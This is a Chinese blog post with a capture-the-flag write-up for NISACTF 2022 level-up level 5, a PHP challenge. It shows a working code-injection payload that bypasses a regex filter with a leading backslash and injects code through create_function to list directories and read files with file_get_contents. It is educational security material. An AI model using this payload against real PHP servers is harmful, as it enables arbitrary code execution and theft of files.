[NISACTF 2022]level-up的level5的wp

最新推荐文章于 2024-05-16 10:23:18 发布
最新推荐文章于 2024-05-16 10:23:18 发布
阅读量128 收藏 1
点赞数
文章标签: php 代码复审 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45446164/article/details/131775251
版权 
<?php
//sorry , here is true last level
//^_^
error_reporting(0);
include "str.php";

$a = $_GET['a'];
$b = $_GET['b'];
if(preg_match('/^[a-z0-9_]*$/isD',$a)){
    show_source(__FILE__);
}
else{
    $a('',$b);
}

这道题看了很久没看通,最后看别的师傅的wp感觉打开了新思路

(preg_match('/^[a-z0-9_]*$/isD',$a))

这个表示首字符(^ 表示匹配字符串的起始位置。)不能用a-z或者下划线,所以使用\来绕过
然后$a在else里面可以使用create_function来创建一个匿名函数,在b使用vardump来打印变量中的详情信息,在vardump使用scandir函数来扫描目录然后使用/*来注释掉后面的代码最后的payload

?a=\create_function&b=}var_dump(scandir('/'));/*

在这里插入图片描述
接下来在更改scandir为file_get_contents()读取文件的内容并返回其内容作为字符串 读取根目录的flag
在这里插入图片描述

s1kSec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
NISACTF 2022 writeup
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
Level-UP
03-07
Level-UP.github.io
[NISACTF 2022]level-up wp
Leaf_initial的博客
04-12 607
好题!上来显示nothing here但是通过查看源码可以知道有Disallow指令,说明有robots.txt文件,直接访问 Disallow指令例如,如果一个网站有一个包含私人信息的目录,如 /private,但不希望搜索引擎抓取这个目录下的内容,就可以在 robots.txt 文件中使用 Disallow 指令来限制访问,如下所示: 找到了level2,直接访问,然后开始代码审计 这里一开始想用数组绕过,但是返回????说明在弱比较的时候就寄了,没办法,只能用md5强碰撞,构造payload(这里用h
[NISACTF 2022]level-up
m0_73612768的博客
01-03 1413
为什么要用大括号}闭合;为什么要加斜杠 \ ;robots.txt;MD5 强比较;sha1 强比较;$_SERVER['REQUEST_URI'];parse_url 函数;PHP GET 传参特殊字符替换;PHP create_function 注入;PHP 的全局空间;
NISACTF 2022-WEB部分wp
m0_74606212的博客
10-11 167
NISACTF 2022-WEB部分wp
[NISACTF 2022]上
qq_62046696的博客
07-26 3388
php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
[NISACTF 2022]
snowlyzz的博客
09-09 5826
NISACTF部分WP
NSSCTF web刷题
akxnxbshai的博客
08-15 2854
闲来无聊写一写NSSCTF
Reverse入门[不断记录]
Aiwin的博客
02-18 2965
CTF Reverse入门笔记,不断记录。
elasticsearch-rest-high-level-client-6.8.3-API文档-中文版.zip
07-13
赠送jar包:elasticsearch-rest-high-level-client-6.8.3.jar; 赠送原API文档:elasticsearch-rest-high-level-client-6.8.3-javadoc.jar; 赠送源代码:elasticsearch-rest-high-level-client-6.8.3-sources.jar;...
elasticsearch-rest-high-level-client-6.8.3-API文档-中英对照版.zip
07-13
赠送jar包:elasticsearch-rest-high-level-client-6.8.3.jar; 赠送原API文档:elasticsearch-rest-high-level-client-6.8.3-javadoc.jar; 赠送源代码:elasticsearch-rest-high-level-client-6.8.3-sources.jar;...
level-rocksdb:捆绑了levelup和Rocksdb的便捷软件包
05-12
var level = require ( 'level-rocksdb' ) // 1) Create our database, supply location and options. // This will create or open the underlying RocksDB store. var db = level ( './mydb' ) // 2)
archived-level-updown:由 LevelUP 支持的 LevelDOWN
05-29
水平向上 由 LevelUP 支持的 LevelDOWN,因此 LevelUP 可以通过 LevelDOWN... 因为level-updown建立在 AbstractLevelDOWN 之上,它已经对可预测的参数类型进行了检查和修复,因此与扩展 LevelUP 相比,您需要进行的参数
如何同步管理1000个设备的VLAN数据?
weixin_68261415的博客
05-15 733
为了方便VLAN的配置和维护,可在部门A和部门B内分别部署VCMP,管理域分别为VCMP1和VCMP2,并选择汇聚交换机AGG1作为VCMP1的Sever,接入交换机ACC1~ACC2作为VCMP1的Client,汇聚交换机AGG2作为VCMP2的Server,接入交换机ACC3~ACC4作为VCMP2的Client。这样,只需在汇聚或核心交换机上创建、删除VLAN或修改VLAN的名称、描述,同域内的接入交换机会同步修改,进而实现VLAN的集中管理,降低配置和维护的工作量。
php centos选择sqlserver的驱动和扩展选择版本的说明
Z.X的博客
05-14 440
2023年2月23日13:41:48首先是php php扩展 驱动 数据库的关系 官方文档说明: https://learn.microsoft.com/zh-cn/sql/connect/php/step-1-configure-development-environment-for-php-development?view=sql-server-2017https://learn.microsoft.com/zh-cn/sql/connect/php/system-requirements-for-th
FebHost:为什么企业需要注册保加利亚.BG域名?
最新发布
05-16 374
品牌本土化战略的实施同样离不开.BG域名的助力。拥有.BG域名的企业可以显著提高其在来自保加利亚的搜索请求中的可见度和排名,吸引更多的目标访问者,提升用户参与度。在当今全球化的商业环境中,对于与保加利亚市场息息相关的企业而言,选择合适的域名至关重要。面对日益饱和的通用顶级域名市场,.BG提供了一个具有区域特色的替代选择,帮助企业在保加利亚市场中树立一个鲜明且难忘的网络形象。综上所述,对于志在保加利亚市场塑造坚实网络地位的企业、组织或个人而言,.BG域名是一个明智且具有战略意义的选择,值得业界关注和利用。
等保测评实体分享three
ddcajdkdl的博客
05-16 924
它除了检测自身的主机以外,根本不检测网络上的情况,而且对入侵行为分析的工作量将随着主机数量的增加而增加,因此全面部署主机入侵检测系统代价比较大,企业很难将所有主机用主机入侵检测系统保护,只能选择部分主机进行保护,那些未安装主机入侵检测系统的机器将成为保护的盲点,入侵者可利用这些机器达到攻击的目标。NIDS一般部署在比较重要的网段内,它不需要改变服务器等主机的配置,由于它不会在业务系统的主机中安装额外的软件,从而不会影响这些机器的CPU、I/O与磁盘等资源的使用,不会影响业务系统的性能。
春秋云境CVE-2022-25487
2303_76653367的博客
05-15 310
Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。
siggraph2022 PRACHTICAL LEVEL-OF-DETAIL AGGREGAATION OF FUR APPEARANCE
06-12
你提到的SIGGRAPH 2022论文《Practical Level-of-Detail Aggregation of Fur Appearance》是一个关于动物毛发渲染的新研究成果。该论文提出了一种实用的毛发外观细节层次聚合方法,可以在保持渲染效果的同时,显著降低计算和存储成本。该方法主要包括两个方面:一是基于预计算的毛发几何形态信息的层次表示,使用哈希表存储每个层次的数据,从而实现快速查询;二是基于逐像素或逐八度贴图的渲染技术,可以在不同的层次之间自适应地选择最佳的细节层次,从而在保证渲染质量的同时,降低计算和存储成本。该方法已经在实际应用中得到了验证,取得了比较好的效果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值